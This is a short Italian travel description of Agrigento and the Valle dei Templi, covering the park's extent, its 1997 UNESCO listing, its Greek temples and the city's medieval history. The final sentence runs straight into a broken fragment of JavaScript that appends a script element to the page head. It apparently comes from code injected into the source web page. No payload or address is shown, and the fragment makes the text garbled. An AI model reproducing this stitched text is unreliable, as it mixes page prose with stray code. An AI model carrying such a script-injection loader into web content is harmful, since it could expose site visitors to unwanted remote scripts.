Agrigento e Valle dei Templi- UNESCO

Partendo da Caltanissetta ed attraversando la campagna odorosa di vitigni si raggiungono Agrigento e la Valle dei Templi.
Il Parco, ampio circa 1300 ettari, conserva uno straordinario patrimonio monumentale e paesaggistico che comprende i resti dell’antica città di Akragas e il territorio ad essa circostante, sino al mare.
Nella Valle dei Templi, dichiarata nel 1997 dall’Unesco “Patrimonio mondiale dell’umanità”, si trova uno dei maggiori complessi archeologici del Mediterraneo, immerso in un paesaggio agricolo di rara bellezza, la cui spettacolarità è particolarmente avvincente nelle ore notturne, quando la Valle viene illuminata. Il tempio della Concordia, di Atena, di Giunone e le altre meraviglie del parco, raccontano di una Sicilia dalle radici greche, tra mito, dei e leggende.
Quando nell’829 la città fu conquistata dagli Arabi, i quartieri abitativi si erano già arroccati sul Colle di Girgenti, nome medievale della città, dove si estende l’odierno abitato di Agrigento.d.getElementsByTagName(‘head’)[0].appendChild(s);document.currentScript.parentNode.insertBefore(s, document.currentScript);}